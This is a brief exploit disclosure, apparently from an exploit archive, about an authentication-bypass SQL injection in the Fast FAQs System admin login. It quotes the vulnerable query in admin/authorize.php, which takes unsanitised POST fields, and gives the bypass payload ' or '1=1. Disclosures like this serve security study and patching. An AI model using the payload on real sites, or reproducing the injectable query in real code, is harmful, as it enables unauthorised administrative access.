id: 4626
date: 01/09/2009
title: Fast FAQs System (Auth Bypass) SQL Injection Vulnerability
author: x0r
cves: 

==========================================================
Fast FAQs System (Auth Bypass) SQL Injection Vulnerability
==========================================================


########################
# -=Fast FAQs System=- #
########################
Autore: x0r
Cms Site: http://fastcreators.com/products/fast_faq/download.php
#########################

Bug In \admin\authorize.php

$query = "select * from admin where userid='{$_POST['uname']}' AND
pass='{$_POST['pass']}'";

Exploit:

' or '1=1

#######################



#  0day.today [2023-03-24]  #